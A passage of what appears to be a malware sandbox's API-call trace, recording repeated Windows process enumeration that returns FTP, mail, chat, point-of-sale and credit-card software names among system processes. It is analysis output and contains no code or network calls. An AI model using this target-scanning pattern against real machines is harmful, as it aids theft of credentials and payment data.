th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0154.839] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0154.842] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0154.844] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0154.847] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0154.849] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0154.852] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0154.855] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0154.858] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0154.860] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0154.896] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0154.899] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0154.902] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0154.920] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0154.923] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0154.926] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0154.929] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0154.932] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0154.937] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0154.940] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0154.943] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0154.946] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0154.952] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0154.955] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0154.957] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0154.961] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0154.963] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0154.966] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0154.968] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0154.970] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0154.973] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0154.976] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0154.978] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0154.980] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0154.982] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0154.985] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0154.992] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0154.995] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0154.997] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0155.002] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0155.005] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0155.007] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0155.010] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0155.012] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0155.013] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0155.016] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0155.019] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0155.021] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0155.023] Process32Next (in: hSnapshot=0x1b90, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0155.025] CloseHandle (hObject=0x1b90) returned 1 [0155.026] Sleep (dwMilliseconds=0x64) [0155.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c50 [0155.174] Process32First (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.177] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0155.179] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0155.181] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.183] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0155.186] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.188] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0155.190] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0155.192] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0155.282] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.284] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.286] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0155.288] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.291] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.293] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.295] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.298] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.300] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.304] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.306] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0155.308] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0155.310] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0155.312] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0155.315] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.317] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0155.378] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0155.380] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0155.382] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0155.384] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0155.386] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0155.388] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.390] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0155.392] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0155.394] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0155.396] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0155.398] Process32Next (in: hSnapshot=0x1c50, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 